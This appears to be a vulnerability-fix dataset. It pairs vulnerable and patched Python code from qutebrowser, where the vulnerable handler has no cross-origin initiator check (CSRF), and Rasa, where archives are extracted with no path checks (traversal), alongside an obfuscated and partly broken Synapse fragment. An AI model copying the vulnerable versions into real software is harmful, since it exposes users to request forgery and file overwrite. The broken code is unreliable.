MediaRepositoryResource,
)
from synapse.secrets import Secrets
from synapse.server_notices.server_notices_manager import ServerNoticesManager
from synapse.server_notices.server_notices_sender import ServerNoticesSender
from synapse.server_notices.worker_server_notices_sender import (
WorkerServerNoticesSender,
)
from synapse.state import StateHandler, StateResolutionHandler
from synapse.storage import Databases, DataStore, Storage
from synapse.streams.events import EventSources
from synapse.types import DomainSpecificString
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.ratelimitutils import FederationRateLimiter
from synapse.util.stringutils import random_string
VAR_0 = logging.getLogger(__name__)
if TYPE_CHECKING:
from synapse.handlers.oidc_handler import OidcHandler
from synapse.handlers.saml_handler import SamlHandler
VAR_1 = TypeVar("T", bound=Callable[..., Any])
def FUNC_0(VAR_2: VAR_1) -> T:
if not VAR_2.__name__.startswith("get_"):
raise Exception(
"@FUNC_0 can only be used on functions starting with `get_`"
)
VAR_3 = VAR_2.__name__[len("get") :]
VAR_4 = [False]
@functools.wraps(VAR_2)
def FUNC_1(self):
try:
return getattr(self, VAR_3)
except AttributeError:
pass
if VAR_4[0]:
raise ValueError("Cyclic dependency while VAR_4 %s" % (VAR_3,))
VAR_4[0] = True
try:
VAR_18 = VAR_2(self)
setattr(self, VAR_3, VAR_18)
finally:
VAR_4[0] = False
return VAR_18
return cast(VAR_1, FUNC_1)
class CLASS_0(metaclass=abc.ABCMeta):
VAR_5 = [
"account_validity",
"auth",
"deactivate_account",
"message",
"pagination",
"profile",
"stats",
]
VAR_6 = abc.abstractproperty()
def __init__(
self,
VAR_7: str,
VAR_8: HomeServerConfig,
VAR_9=None,
VAR_10="Synapse",
):
if not VAR_9:
from twisted.internet import .reactor as _reactor
VAR_9 = _reactor
self._reactor = VAR_9
self.hostname = VAR_7
self.signing_key = VAR_8.key.signing_key[0]
self.config = VAR_8
self._listening_services = [] # type: List[twisted.internet.tcp.Port]
self.start_time = None # type: Optional[int]
self._instance_id = random_string(5)
self._instance_name = VAR_8.worker_name or "master"
self.version_string = VAR_10
self.datastores = None # type: Optional[Databases]
def FUNC_2(self) -> str:
return self._instance_id
def FUNC_3(self) -> str:
return self._instance_name
def FUNC_4(self) -> None:
VAR_0.info("Setting up.")
self.start_time = int(self.get_clock().time())
self.datastores = Databases(self.DATASTORE_CLASS, self)
VAR_0.info("Finished setting up.")
if self.config.run_background_tasks:
self.setup_background_tasks()
def FUNC_5(self) -> None:
for i in self.REQUIRED_ON_BACKGROUND_TASK_STARTUP:
getattr(self, "get_" + i + "_handler")()
def FUNC_6(self) -> twisted.internet.base.ReactorBase:
return self._reactor
def FUNC_7(self, VAR_11) -> str:
return VAR_11.getClientIP()
def FUNC_8(self, VAR_12: DomainSpecificString) -> bool:
return VAR_12.domain == self.hostname
def FUNC_9(self, VAR_13: str) -> bool:
return VAR_13.split(":", 1)[1] == self.hostname
@FUNC_0
def FUNC_10(self) -> Clock:
return Clock(self._reactor)
def FUNC_11(self) -> DataStore:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores.main
def FUNC_12(self) -> Databases:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores
def FUNC_13(self) -> HomeServerConfig:
return self.config
@FUNC_0
def FUNC_14(self) -> Distributor:
return Distributor()
@FUNC_0
def FUNC_15(self) -> Ratelimiter:
return Ratelimiter(
clock=self.get_clock(),
rate_hz=self.config.rc_registration.per_second,
burst_count=self.config.rc_registration.burst_count,
)
@FUNC_0
def FUNC_16(self) -> FederationClient:
return FederationClient(self)
@FUNC_0
def FUNC_17(self) -> FederationServer:
return FederationServer(self)
@FUNC_0
def FUNC_18(self) -> Notifier:
return Notifier(self)
@FUNC_0
def FUNC_19(self) -> Auth:
return Auth(self)
@FUNC_0
def FUNC_20(self) -> IPolicyForHTTPS:
return (
InsecureInterceptableContextFactory()
if self.config.use_insecure_ssl_client_just_for_testing_do_not_use
else RegularPolicyForHTTPS()
)
@FUNC_0
def FUNC_21(self) -> SimpleHttpClient:
return SimpleHttpClient(self)
@FUNC_0
def FUNC_22(self) -> SimpleHttpClient:
return SimpleHttpClient(
self,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@FUNC_0
def FUNC_23(self) -> SimpleHttpClient:
return SimpleHttpClient(
self,
ip_blacklist=self.config.ip_range_blacklist,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@FUNC_0
def FUNC_24(self) -> MatrixFederationHttpClient:
VAR_17 = context_factory.FederationPolicyForHTTPS(
self.config
)
return MatrixFederationHttpClient(self, VAR_17)
@FUNC_0
def FUNC_25(self) -> RoomCreationHandler:
return RoomCreationHandler(self)
@FUNC_0
def FUNC_26(self) -> RoomShutdownHandler:
return RoomShutdownHandler(self)
@FUNC_0
def FUNC_27(self) -> sendmail:
return sendmail
@FUNC_0
def FUNC_28(self) -> StateHandler:
return StateHandler(self)
@FUNC_0
def FUNC_29(self) -> StateResolutionHandler:
return StateResolutionHandler(self)
@FUNC_0
def FUNC_30(self) -> PresenceHandler:
return PresenceHandler(self)
@FUNC_0
def FUNC_31(self):
if self.config.worker.writers.typing == self.get_instance_name():
return TypingWriterHandler(self)
else:
return FollowerTypingHandler(self)
@FUNC_0
def FUNC_32(self) -> SsoHandler:
return SsoHandler(self)
@FUNC_0
def FUNC_33(self) -> SyncHandler:
return SyncHandler(self)
@FUNC_0
def FUNC_34(self) -> RoomListHandler:
return RoomListHandler(self)
@FUNC_0
def FUNC_35(self) -> AuthHandler:
return AuthHandler(self)
@FUNC_0
def FUNC_36(self) -> MacaroonGenerator:
return MacaroonGenerator(self)
@FUNC_0
def FUNC_37(self):
if self.config.worker_app:
return DeviceWorkerHandler(self)
else:
return DeviceHandler(self)
@FUNC_0
def FUNC_38(self) -> DeviceMessageHandler:
return DeviceMessageHandler(self)
@FUNC_0
def FUNC_39(self) -> DirectoryHandler:
return DirectoryHandler(self)
@FUNC_0
def FUNC_40(self) -> E2eKeysHandler:
return E2eKeysHandler(self)
@FUNC_0
def FUNC_41(self) -> E2eRoomKeysHandler:
return E2eRoomKeysHandler(self)
@FUNC_0
def FUNC_42(self) -> AcmeHandler:
return AcmeHandler(self)
@FUNC_0
def FUNC_43(self) -> AdminHandler:
return AdminHandler(self)
@FUNC_0
def FUNC_44(self) -> ApplicationServiceApi:
return ApplicationServiceApi(self)
@FUNC_0
def FUNC_45(self) -> ApplicationServiceScheduler:
return ApplicationServiceScheduler(self)
@FUNC_0
def FUNC_46(self) -> ApplicationServicesHandler:
return ApplicationServicesHandler(self)
@FUNC_0
def FUNC_47(self) -> EventHandler:
return EventHandler(self)
@FUNC_0
def FUNC_48(self) -> EventStreamHandler:
return EventStreamHandler(self)
@FUNC_0
def FUNC_49(self) -> FederationHandler:
return FederationHandler(self)
@FUNC_0
def FUNC_50(self) -> IdentityHandler:
return IdentityHandler(self)
@FUNC_0
def FUNC_51(self) -> InitialSyncHandler:
return InitialSyncHandler(self)
@FUNC_0
def FUNC_52(self):
return ProfileHandler(self)
@FUNC_0
def FUNC_53(self) -> EventCreationHandler:
return EventCreationHandler(self)
@FUNC_0
def FUNC_54(self) -> DeactivateAccountHandler:
return DeactivateAccountHandler(self)
@FUNC_0
def FUNC_55(self) -> SearchHandler:
return SearchHandler(self)
@FUNC_0
def FUNC_56(self) -> SetPasswordHandler:
return SetPasswordHandler(self)
@FUNC_0
def FUNC_57(self) -> EventSources:
return EventSources(self)
@FUNC_0
def FUNC_58(self) -> Keyring:
return Keyring(self)
@FUNC_0
def FUNC_59(self) -> EventBuilderFactory:
return EventBuilderFactory(self)
@FUNC_0
def FUNC_60(self) -> Filtering:
return Filtering(self)
@FUNC_0
def FUNC_61(self) -> PusherPool:
return PusherPool(self)
@FUNC_0
def FUNC_62(self) -> MediaRepositoryResource:
return MediaRepositoryResource(self)
@FUNC_0
def FUNC_63(self) -> MediaRepository:
return MediaRepository(self)
@FUNC_0
def FUNC_64(self) -> TransportLayerClient:
return TransportLayerClient(self)
@FUNC_0
def FUNC_65(self):
if self.should_send_federation():
return FederationSender(self)
elif not self.config.worker_app:
return FederationRemoteSendQueue(self)
else:
raise Exception("Workers cannot send federation traffic")
@FUNC_0
def FUNC_66(self) -> ReceiptsHandler:
return ReceiptsHandler(self)
@FUNC_0
def FUNC_67(self) -> ReadMarkerHandler:
return ReadMarkerHandler(self)
@FUNC_0
def FUNC_68(self) -> ReplicationCommandHandler:
return ReplicationCommandHandler(self)
@FUNC_0
def FUNC_69(self) -> ActionGenerator:
return ActionGenerator(self)
@FUNC_0
def FUNC_70(self) -> UserDirectoryHandler:
return UserDirectoryHandler(self)
@FUNC_0
def FUNC_71(self):
if self.config.worker_app:
return GroupsLocalWorkerHandler(self)
else:
return GroupsLocalHandler(self)
@FUNC_0
def FUNC_72(self):
if self.config.worker_app:
return GroupsServerWorkerHandler(self)
else:
return GroupsServerHandler(self)
@FUNC_0
def FUNC_73(self) -> GroupAttestationSigning:
return GroupAttestationSigning(self)
@FUNC_0
def FUNC_74(self) -> GroupAttestionRenewer:
return GroupAttestionRenewer(self)
@FUNC_0
def FUNC_75(self) -> Secrets:
return Secrets()
@FUNC_0
def FUNC_76(self) -> StatsHandler:
return StatsHandler(self)
@FUNC_0
def FUNC_77(self):
return SpamChecker(self)
@FUNC_0
def FUNC_78(self) -> ThirdPartyEventRules:
return ThirdPartyEventRules(self)
@FUNC_0
def FUNC_79(self):
if self.config.worker_app:
return RoomMemberWorkerHandler(self)
return RoomMemberMasterHandler(self)
@FUNC_0
def FUNC_80(self) -> FederationHandlerRegistry:
return FederationHandlerRegistry(self)
@FUNC_0
def FUNC_81(self):
if self.config.worker_app:
raise Exception("Workers cannot send server notices")
return ServerNoticesManager(self)
@FUNC_0
def FUNC_82(self):
if self.config.worker_app:
return WorkerServerNoticesSender(self)
return ServerNoticesSender(self)
@FUNC_0
def FUNC_83(self) -> MessageHandler:
return MessageHandler(self)
@FUNC_0
def FUNC_84(self) -> PaginationHandler:
return PaginationHandler(self)
@FUNC_0
def FUNC_85(self) -> RoomContextHandler:
return RoomContextHandler(self)
@FUNC_0
def FUNC_86(self) -> RegistrationHandler:
return RegistrationHandler(self)
@FUNC_0
def FUNC_87(self) -> AccountValidityHandler:
return AccountValidityHandler(self)
@FUNC_0
def FUNC_88(self) -> CasHandler:
return CasHandler(self)
@FUNC_0
def FUNC_89(self) -> "SamlHandler":
from synapse.handlers.saml_handler import SamlHandler
return SamlHandler(self)
@FUNC_0
def FUNC_90(self) -> "OidcHandler":
from synapse.handlers.oidc_handler import OidcHandler
return OidcHandler(self)
@FUNC_0
def FUNC_91(self) -> EventClientSerializer:
return EventClientSerializer(self)
@FUNC_0
def FUNC_92(self) -> PasswordPolicyHandler:
return PasswordPolicyHandler(self)
@FUNC_0
def FUNC_93(self) -> Storage:
return Storage(self, self.get_datastores())
@FUNC_0
def FUNC_94(self) -> ReplicationStreamer:
return ReplicationStreamer(self)
@FUNC_0
def FUNC_95(self) -> ReplicationDataHandler:
return ReplicationDataHandler(self)
@FUNC_0
def FUNC_96(self) -> Dict[str, Stream]:
return {stream.NAME: stream(self) for stream in STREAMS_MAP.values()}
@FUNC_0
def FUNC_97(self) -> FederationRateLimiter:
return FederationRateLimiter(self.get_clock(), VAR_8=self.config.rc_federation)
@FUNC_0
def FUNC_98(self) -> ModuleApi:
return ModuleApi(self, self.get_auth_handler())
async def FUNC_99(self, VAR_14: str, VAR_15: str, VAR_16: str):
return await self.get_pusherpool().remove_pusher(VAR_14, VAR_15, VAR_16)
return self.config.send_federation and (
not self.config.worker_app
or self.config.worker_app == "synapse.app.federation_sender"
)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
29,
34,
126,
128,
132,
133,
135,
136,
140,
144,
149,
150,
152,
154,
161,
162,
165,
172,
174,
175,
176,
178,
179,
182,
186,
189,
195,
205,
206,
207,
208,
210,
225,
227,
230,
235,
238,
240,
242,
245,
250,
253,
258,
264,
265,
266,
267,
270,
279,
285,
287,
289,
292,
295,
299,
303,
305,
309,
311,
314,
318,
326,
330,
334,
338,
342,
350,
354,
362,
366,
370,
374,
378,
382,
386,
393,
397,
401,
405,
409,
413,
420,
424,
428,
432,
436,
440,
444,
448,
452,
456,
460,
464,
468,
472,
476,
480,
484,
488,
492,
496,
500,
504,
508,
512,
516,
523,
526,
527,
529,
533,
537,
546,
550,
554,
558,
562,
566,
573,
580,
584,
588,
592,
596,
600,
604,
610,
614,
620,
626,
630,
634,
638,
642,
646,
650,
654,
656,
660,
662,
666,
670,
674,
678,
682,
686,
690,
694,
697,
704,
138,
139,
140,
141,
142,
143,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
194,
218,
219,
220,
221,
222,
244,
245,
246,
247,
248,
252,
253,
254,
255,
256,
272,
273,
274,
275,
276,
281,
282,
283,
698,
699
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
29,
34,
126,
128,
132,
133,
135,
136,
140,
144,
149,
150,
152,
154,
161,
162,
165,
172,
174,
175,
176,
178,
179,
182,
186,
189,
195,
205,
206,
207,
208,
210,
225,
227,
230,
235,
238,
240,
242,
245,
250,
253,
258,
264,
265,
266,
267,
270,
279,
285,
287,
289,
292,
295,
299,
303,
305,
309,
311,
314,
318,
326,
330,
334,
338,
342,
350,
357,
368,
381,
391,
395,
399,
403,
407,
411,
415,
422,
426,
430,
434,
438,
442,
449,
453,
457,
461,
465,
469,
473,
477,
481,
485,
489,
493,
497,
501,
505,
509,
513,
517,
521,
525,
529,
533,
537,
541,
545,
548,
549,
551,
555,
559,
568,
572,
576,
580,
584,
588,
595,
602,
606,
610,
614,
618,
622,
626,
632,
636,
642,
648,
652,
656,
660,
664,
668,
672,
676,
678,
682,
684,
688,
692,
696,
700,
704,
708,
712,
716,
719,
726,
138,
139,
140,
141,
142,
143,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
194,
218,
219,
220,
221,
222,
244,
245,
246,
247,
248,
252,
253,
254,
255,
256,
272,
273,
274,
275,
276,
281,
282,
283,
353,
354,
355,
360,
361,
362,
371,
372,
373,
374,
384,
385,
386,
720,
721
] |
3CWE-352
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""QtWebEngine specific qute://* handlers and glue code."""
from PyQt5.QtCore import QBuffer, QIODevice
from PyQt5.QtWebEngineCore import (QWebEngineUrlSchemeHandler,
QWebEngineUrlRequestJob)
from qutebrowser.browser import qutescheme
from qutebrowser.utils import log, qtutils
class QuteSchemeHandler(QWebEngineUrlSchemeHandler):
"""Handle qute://* requests on QtWebEngine."""
def install(self, profile):
"""Install the handler for qute:// URLs on the given profile."""
profile.installUrlSchemeHandler(b'qute', self)
if qtutils.version_check('5.11', compiled=False):
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-63378
profile.installUrlSchemeHandler(b'chrome-error', self)
profile.installUrlSchemeHandler(b'chrome-extension', self)
def requestStarted(self, job):
"""Handle a request for a qute: scheme.
This method must be reimplemented by all custom URL scheme handlers.
The request is asynchronous and does not need to be handled right away.
Args:
job: QWebEngineUrlRequestJob
"""
url = job.requestUrl()
if url.scheme() in ['chrome-error', 'chrome-extension']:
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-63378
job.fail(QWebEngineUrlRequestJob.UrlInvalid)
return
assert job.requestMethod() == b'GET'
assert url.scheme() == 'qute'
log.misc.debug("Got request for {}".format(url.toDisplayString()))
try:
mimetype, data = qutescheme.data_for_url(url)
except qutescheme.NoHandlerFound:
log.misc.debug("No handler found for {}".format(
url.toDisplayString()))
job.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeOSError:
# FIXME:qtwebengine how do we show a better error here?
log.misc.exception("OSError while handling qute://* URL")
job.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeError:
# FIXME:qtwebengine how do we show a better error here?
log.misc.exception("Error while handling qute://* URL")
job.fail(QWebEngineUrlRequestJob.RequestFailed)
except qutescheme.Redirect as e:
qtutils.ensure_valid(e.url)
job.redirect(e.url)
else:
log.misc.debug("Returning {} data".format(mimetype))
# We can't just use the QBuffer constructor taking a QByteArray,
# because that somehow segfaults...
# https://www.riverbankcomputing.com/pipermail/pyqt/2016-September/038075.html
buf = QBuffer(parent=self)
buf.open(QIODevice.WriteOnly)
buf.write(data)
buf.seek(0)
buf.close()
job.reply(mimetype.encode('ascii'), buf)
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""QtWebEngine specific qute://* handlers and glue code."""
from PyQt5.QtCore import QBuffer, QIODevice
from PyQt5.QtWebEngineCore import (QWebEngineUrlSchemeHandler,
QWebEngineUrlRequestJob)
from qutebrowser.browser import qutescheme
from qutebrowser.utils import log, qtutils
class QuteSchemeHandler(QWebEngineUrlSchemeHandler):
"""Handle qute://* requests on QtWebEngine."""
def install(self, profile):
"""Install the handler for qute:// URLs on the given profile."""
profile.installUrlSchemeHandler(b'qute', self)
if qtutils.version_check('5.11', compiled=False):
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-63378
profile.installUrlSchemeHandler(b'chrome-error', self)
profile.installUrlSchemeHandler(b'chrome-extension', self)
def requestStarted(self, job):
"""Handle a request for a qute: scheme.
This method must be reimplemented by all custom URL scheme handlers.
The request is asynchronous and does not need to be handled right away.
Args:
job: QWebEngineUrlRequestJob
"""
url = job.requestUrl()
if url.scheme() in ['chrome-error', 'chrome-extension']:
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-63378
job.fail(QWebEngineUrlRequestJob.UrlInvalid)
return
# Only the browser itself or qute:// pages should access any of those
# URLs.
# The request interceptor further locks down qute://settings/set.
try:
initiator = job.initiator()
except AttributeError:
# Added in Qt 5.11
pass
else:
if initiator.isValid() and initiator.scheme() != 'qute':
log.misc.warning("Blocking malicious request from {} to {}"
.format(initiator.toDisplayString(),
url.toDisplayString()))
job.fail(QWebEngineUrlRequestJob.RequestDenied)
return
if job.requestMethod() != b'GET':
job.fail(QWebEngineUrlRequestJob.RequestDenied)
return
assert url.scheme() == 'qute'
log.misc.debug("Got request for {}".format(url.toDisplayString()))
try:
mimetype, data = qutescheme.data_for_url(url)
except qutescheme.NoHandlerFound:
log.misc.debug("No handler found for {}".format(
url.toDisplayString()))
job.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeOSError:
# FIXME:qtwebengine how do we show a better error here?
log.misc.exception("OSError while handling qute://* URL")
job.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeError:
# FIXME:qtwebengine how do we show a better error here?
log.misc.exception("Error while handling qute://* URL")
job.fail(QWebEngineUrlRequestJob.RequestFailed)
except qutescheme.Redirect as e:
qtutils.ensure_valid(e.url)
job.redirect(e.url)
else:
log.misc.debug("Returning {} data".format(mimetype))
# We can't just use the QBuffer constructor taking a QByteArray,
# because that somehow segfaults...
# https://www.riverbankcomputing.com/pipermail/pyqt/2016-September/038075.html
buf = QBuffer(parent=self)
buf.open(QIODevice.WriteOnly)
buf.write(data)
buf.seek(0)
buf.close()
job.reply(mimetype.encode('ascii'), buf)
| xsrf | {
"code": [
" assert job.requestMethod() == b'GET'"
],
"line_no": [
58
]
} | {
"code": [
" try:",
" initiator = job.initiator()",
" except AttributeError:",
" pass",
" else:",
" if initiator.isValid() and initiator.scheme() != 'qute':",
" .format(initiator.toDisplayString(),",
" url.toDisplayString()))",
" job.fail(QWebEngineUrlRequestJob.RequestDenied)",
" if job.requestMethod() != b'GET':",
" job.fail(QWebEngineUrlRequestJob.RequestDenied)",
" return"
],
"line_no": [
61,
62,
63,
65,
66,
67,
69,
70,
71,
74,
75,
76
]
} |
from PyQt5.QtCore import QBuffer, QIODevice
from PyQt5.QtWebEngineCore import (QWebEngineUrlSchemeHandler,
QWebEngineUrlRequestJob)
from qutebrowser.browser import qutescheme
from qutebrowser.utils import log, qtutils
class CLASS_0(QWebEngineUrlSchemeHandler):
def FUNC_0(self, VAR_0):
VAR_0.installUrlSchemeHandler(b'qute', self)
if qtutils.version_check('5.11', compiled=False):
VAR_0.installUrlSchemeHandler(b'chrome-error', self)
VAR_0.installUrlSchemeHandler(b'chrome-extension', self)
def FUNC_1(self, VAR_1):
VAR_2 = VAR_1.requestUrl()
if VAR_2.scheme() in ['chrome-error', 'chrome-extension']:
VAR_1.fail(QWebEngineUrlRequestJob.UrlInvalid)
return
assert VAR_1.requestMethod() == b'GET'
assert VAR_2.scheme() == 'qute'
log.misc.debug("Got request for {}".format(VAR_2.toDisplayString()))
try:
VAR_3, VAR_4 = qutescheme.data_for_url(VAR_2)
except qutescheme.NoHandlerFound:
log.misc.debug("No handler found for {}".format(
VAR_2.toDisplayString()))
VAR_1.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeOSError:
log.misc.exception("OSError while handling qute://* URL")
VAR_1.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeError:
log.misc.exception("Error while handling qute://* URL")
VAR_1.fail(QWebEngineUrlRequestJob.RequestFailed)
except qutescheme.Redirect as e:
qtutils.ensure_valid(e.url)
VAR_1.redirect(e.url)
else:
log.misc.debug("Returning {} data".format(VAR_3))
VAR_5 = QBuffer(parent=self)
VAR_5.open(QIODevice.WriteOnly)
VAR_5.write(VAR_4)
VAR_5.seek(0)
VAR_5.close()
VAR_1.reply(VAR_3.encode('ascii'), VAR_5)
|
from PyQt5.QtCore import QBuffer, QIODevice
from PyQt5.QtWebEngineCore import (QWebEngineUrlSchemeHandler,
QWebEngineUrlRequestJob)
from qutebrowser.browser import qutescheme
from qutebrowser.utils import log, qtutils
class CLASS_0(QWebEngineUrlSchemeHandler):
def FUNC_0(self, VAR_0):
VAR_0.installUrlSchemeHandler(b'qute', self)
if qtutils.version_check('5.11', compiled=False):
VAR_0.installUrlSchemeHandler(b'chrome-error', self)
VAR_0.installUrlSchemeHandler(b'chrome-extension', self)
def FUNC_1(self, VAR_1):
VAR_2 = VAR_1.requestUrl()
if VAR_2.scheme() in ['chrome-error', 'chrome-extension']:
VAR_1.fail(QWebEngineUrlRequestJob.UrlInvalid)
return
try:
VAR_3 = VAR_1.initiator()
except AttributeError:
pass
else:
if VAR_3.isValid() and VAR_3.scheme() != 'qute':
log.misc.warning("Blocking malicious request from {} to {}"
.format(VAR_3.toDisplayString(),
VAR_2.toDisplayString()))
VAR_1.fail(QWebEngineUrlRequestJob.RequestDenied)
return
if VAR_1.requestMethod() != b'GET':
VAR_1.fail(QWebEngineUrlRequestJob.RequestDenied)
return
assert VAR_2.scheme() == 'qute'
log.misc.debug("Got request for {}".format(VAR_2.toDisplayString()))
try:
VAR_4, VAR_5 = qutescheme.data_for_url(VAR_2)
except qutescheme.NoHandlerFound:
log.misc.debug("No handler found for {}".format(
VAR_2.toDisplayString()))
VAR_1.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeOSError:
log.misc.exception("OSError while handling qute://* URL")
VAR_1.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeError:
log.misc.exception("Error while handling qute://* URL")
VAR_1.fail(QWebEngineUrlRequestJob.RequestFailed)
except qutescheme.Redirect as e:
qtutils.ensure_valid(e.url)
VAR_1.redirect(e.url)
else:
log.misc.debug("Returning {} data".format(VAR_4))
VAR_6 = QBuffer(parent=self)
VAR_6.open(QIODevice.WriteOnly)
VAR_6.write(VAR_5)
VAR_6.seek(0)
VAR_6.close()
VAR_1.reply(VAR_4.encode('ascii'), VAR_6)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
25,
28,
29,
31,
33,
38,
41,
44,
47,
52,
54,
57,
68,
72,
80,
81,
82,
83,
90,
20,
32,
35,
43,
44,
45,
46,
47,
48,
49,
50
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
25,
28,
29,
31,
33,
38,
41,
44,
47,
52,
54,
57,
58,
59,
60,
64,
73,
77,
79,
88,
92,
100,
101,
102,
103,
110,
20,
32,
35,
43,
44,
45,
46,
47,
48,
49,
50
] |
0CWE-22
| import asyncio
import logging
import os
import pickle
import tarfile
import tempfile
import warnings
import zipfile
import re
from asyncio import AbstractEventLoop
from io import BytesIO as IOReader
from pathlib import Path
from typing import Text, Any, Union, List, Type, Callable, TYPE_CHECKING, Pattern
import rasa.shared.constants
import rasa.shared.utils.io
if TYPE_CHECKING:
from prompt_toolkit.validation import Validator
def configure_colored_logging(loglevel: Text) -> None:
import coloredlogs
loglevel = loglevel or os.environ.get(
rasa.shared.constants.ENV_LOG_LEVEL, rasa.shared.constants.DEFAULT_LOG_LEVEL
)
field_styles = coloredlogs.DEFAULT_FIELD_STYLES.copy()
field_styles["asctime"] = {}
level_styles = coloredlogs.DEFAULT_LEVEL_STYLES.copy()
level_styles["debug"] = {}
coloredlogs.install(
level=loglevel,
use_chroot=False,
fmt="%(asctime)s %(levelname)-8s %(name)s - %(message)s",
level_styles=level_styles,
field_styles=field_styles,
)
def enable_async_loop_debugging(
event_loop: AbstractEventLoop, slow_callback_duration: float = 0.1
) -> AbstractEventLoop:
logging.info(
"Enabling coroutine debugging. Loop id {}.".format(id(asyncio.get_event_loop()))
)
# Enable debugging
event_loop.set_debug(True)
# Make the threshold for "slow" tasks very very small for
# illustration. The default is 0.1 (= 100 milliseconds).
event_loop.slow_callback_duration = slow_callback_duration
# Report all mistakes managing asynchronous resources.
warnings.simplefilter("always", ResourceWarning)
return event_loop
def pickle_dump(filename: Union[Text, Path], obj: Any) -> None:
"""Saves object to file.
Args:
filename: the filename to save the object to
obj: the object to store
"""
with open(filename, "wb") as f:
pickle.dump(obj, f)
def pickle_load(filename: Union[Text, Path]) -> Any:
"""Loads an object from a file.
Args:
filename: the filename to load the object from
Returns: the loaded object
"""
with open(filename, "rb") as f:
return pickle.load(f)
def unarchive(byte_array: bytes, directory: Text) -> Text:
"""Tries to unpack a byte array interpreting it as an archive.
Tries to use tar first to unpack, if that fails, zip will be used."""
try:
tar = tarfile.open(fileobj=IOReader(byte_array))
tar.extractall(directory)
tar.close()
return directory
except tarfile.TarError:
zip_ref = zipfile.ZipFile(IOReader(byte_array))
zip_ref.extractall(directory)
zip_ref.close()
return directory
def create_temporary_file(data: Any, suffix: Text = "", mode: Text = "w+") -> Text:
"""Creates a tempfile.NamedTemporaryFile object for data.
mode defines NamedTemporaryFile's mode parameter in py3."""
encoding = None if "b" in mode else rasa.shared.utils.io.DEFAULT_ENCODING
f = tempfile.NamedTemporaryFile(
mode=mode, suffix=suffix, delete=False, encoding=encoding
)
f.write(data)
f.close()
return f.name
def create_temporary_directory() -> Text:
"""Creates a tempfile.TemporaryDirectory."""
f = tempfile.TemporaryDirectory()
return f.name
def create_path(file_path: Text) -> None:
"""Makes sure all directories in the 'file_path' exists."""
parent_dir = os.path.dirname(os.path.abspath(file_path))
if not os.path.exists(parent_dir):
os.makedirs(parent_dir)
def file_type_validator(
valid_file_types: List[Text], error_message: Text
) -> Type["Validator"]:
"""Creates a `Validator` class which can be used with `questionary` to validate
file paths.
"""
def is_valid(path: Text) -> bool:
return path is not None and any(
[path.endswith(file_type) for file_type in valid_file_types]
)
return create_validator(is_valid, error_message)
def not_empty_validator(error_message: Text) -> Type["Validator"]:
"""Creates a `Validator` class which can be used with `questionary` to validate
that the user entered something other than whitespace.
"""
def is_valid(input: Text) -> bool:
return input is not None and input.strip() != ""
return create_validator(is_valid, error_message)
def create_validator(
function: Callable[[Text], bool], error_message: Text
) -> Type["Validator"]:
"""Helper method to create `Validator` classes from callable functions. Should be
removed when questionary supports `Validator` objects."""
from prompt_toolkit.validation import Validator, ValidationError
from prompt_toolkit.document import Document
class FunctionValidator(Validator):
@staticmethod
def validate(document: Document) -> None:
is_valid = function(document.text)
if not is_valid:
raise ValidationError(message=error_message)
return FunctionValidator
def json_unpickle(file_name: Union[Text, Path]) -> Any:
    """Unpickle an object from file using json.

    Args:
        file_name: the file to load the object from

    Returns: the object
    """
    import jsonpickle.ext.numpy as jsonpickle_numpy
    import jsonpickle

    # Register numpy handlers so arrays round-trip correctly.
    jsonpickle_numpy.register_handlers()

